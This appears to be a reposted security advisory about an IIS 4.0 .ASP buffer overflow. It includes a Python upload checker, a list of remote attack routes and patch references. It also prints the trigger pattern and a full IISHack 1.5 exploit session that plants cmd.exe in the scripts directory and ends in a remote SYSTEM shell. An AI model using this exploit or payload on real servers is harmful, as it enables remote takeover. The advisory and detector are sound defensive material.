IIS .ASP File Buffer Overflow Vulnerability

王朝 ASP · Author: anonymous  2008-05-19

Affected program:

ASP

Description:

IIS .ASP file buffer overflow vulnerability

Details:

A buffer overflow vulnerability exists in the .ASP ISAPI file-parsing mechanism of Microsoft IIS 4.0; exploiting it can yield SYSTEM-level access.

The vulnerability is a local one, but it becomes remotely exploitable if an attacker can upload an .asp file.

When processing the "LANGUAGE" variable of a Java Script block, supplying an overly long string as the "LANGUAGE" value causes inetinfo.exe to overflow while IIS parses the file. Below is an example .asp file:

...

<SCRIPT LANGUAGE="[buffer]" RUNAT="Server">

</SCRIPT>

...

When [buffer] contains 2220 or more characters, the overflow occurs. This can allow an attacker to gain SYSTEM-level privileges.
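As an added example, not part of this advisory or of eEye's tool, the following Python check flags uploaded .asp files whose SCRIPT LANGUAGE value reaches the 2220-character length given above; the file names and sample contents are constructed here, and the length threshold is the one stated on this page.

```python
import re
from typing import List, Tuple

# Length at which, per the advisory, the LANGUAGE value overflows inetinfo.exe.
OVERFLOW_LENGTH = 2220

# Finds a <SCRIPT ...> tag and captures its LANGUAGE attribute value, whether it is
# double-quoted, single-quoted or unquoted. The tag's closing ">" is deliberately not
# required, so a truncated or unterminated tag is still inspected.
SCRIPT_LANGUAGE = re.compile(
    r"""<script\b[^>]*?\blanguage\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""",
    re.IGNORECASE | re.DOTALL,
)


def find_oversized_language_attrs(asp_source: str,
                                  threshold: int = OVERFLOW_LENGTH) -> List[Tuple[int, int]]:
    """Return (tag offset, value length) for every SCRIPT LANGUAGE value of at
    least `threshold` characters in the given .asp source."""
    findings = []
    for m in SCRIPT_LANGUAGE.finditer(asp_source):
        value = next(g for g in m.groups() if g is not None)
        if len(value) >= threshold:
            findings.append((m.start(), len(value)))
    return findings


def review_upload(filename: str, asp_source: str) -> str:
    """Produce a one-line verdict for a file about to be placed in a web root."""
    hits = find_oversized_language_attrs(asp_source)
    if not hits:
        return f"{filename}: ok"
    detail = ", ".join(f"offset {off}: LANGUAGE value of {n} chars" for off, n in hits)
    return f"{filename}: REJECT ({detail})"


# Constructed sample inputs (not taken from the advisory): a normal server-side
# script block and the pattern the advisory describes, with [buffer] filled in.
BENIGN_ASP = ('<%@ LANGUAGE="VBScript" %>\n'
              '<SCRIPT LANGUAGE="JScript" RUNAT="Server">\n'
              'Response.Write("hello")\n'
              '</SCRIPT>\n')
SUSPICIOUS_ASP = '<SCRIPT LANGUAGE="' + "A" * OVERFLOW_LENGTH + '" RUNAT="Server">\n</SCRIPT>\n'

if __name__ == "__main__":
    print(review_upload("index.asp", BENIGN_ASP))
    print(review_upload("upload.asp", SUSPICIOUS_ASP))
```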

An attacker can carry out a remote attack in the following ways:

* On sites that offer virtual hosting or asp uploads, the attacker only needs to upload a malicious asp file to gain SYSTEM privileges remotely.

* Some guestbook or BBS programs allow users to enter Java Script. The attacker can enter Java Script statements containing malicious code in a message and compromise the system remotely.

* Using the IIS unicode vulnerability, the attacker can remotely create a malicious asp file on the affected system and launch the overflow attack.

The following code is provided solely for testing and researching this vulnerability; if you use it for improper purposes, you bear the consequences yourself.

C:\we are still hiring good programmers>iishack1.5.exe
IISHack Version 1.5
eEye Digital Security
http://www.eEye.com
Code By: Ryan Permeh & Marc Maiffret
eEye Digital Security takes no responsibility for use of this code.
It is for educational purposes only.

Usage: IISHack1.5 [server] [server-port] [trojan-port]

C:\send resume to hire@eeye.com>iishack1.5.exe www.[yourowncompany].com 80 6969
IISHack Version 1.5
eEye Digital Security
http://www.eEye.com
Code By: Ryan Permeh & Marc Maiffret
eEye Digital Security takes no responsibility for use of this code.
It is for educational purposes only.

Attempting to find an executable directory...
Trying directory [scripts]
Executable directory found. [scripts]
Path to executable directory is [C:\Inetpub\scripts]
Moving cmd.exe from winnt\system32 to C:\Inetpub\scripts.
Successfully moved cmd.exe to C:\Inetpub\scripts\eeyehack.exe
Sending the exploit...
Exploit sent! Now telnet to www.[yourowncompany].com on port 6969 and you
should get a cmd prompt.

C:\>telnet www.[yourowncompany].com 6969
Trying www.[yourowncompany].com...
Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.

C:\WINNT\system32>whoami
NT AUTHORITY\SYSTEM

Affected systems:

Microsoft IIS 4.0 sp6

- Microsoft Windows NT 4.0

Unaffected systems:

Microsoft IIS 5.0

- Microsoft Windows 2000?

Solution:

Microsoft has fixed this buffer overflow in several hot fixes; installing any of the following hot fixes repairs the vulnerability:

MS00-080: Patch Available for "Session ID Cookie Marking" Vulnerability

MS00-060: Patch Available for "IIS Cross-Site Scripting" Vulnerabilities

MS00-057: Patch Available for "File Permission Canonicalization" Vulnerability

MS00-030: Patch Available for "Malformed Extension Data in URL" Vulnerability

MS00-023: Patch Available for "Myriad Escaped Characters" Vulnerability

MS00-019: Patch Available for "Virtualized UNC Share" Vulnerability

MS00-018: Patch Available for "Chunked Encoding Post" Vulnerability

 
 
 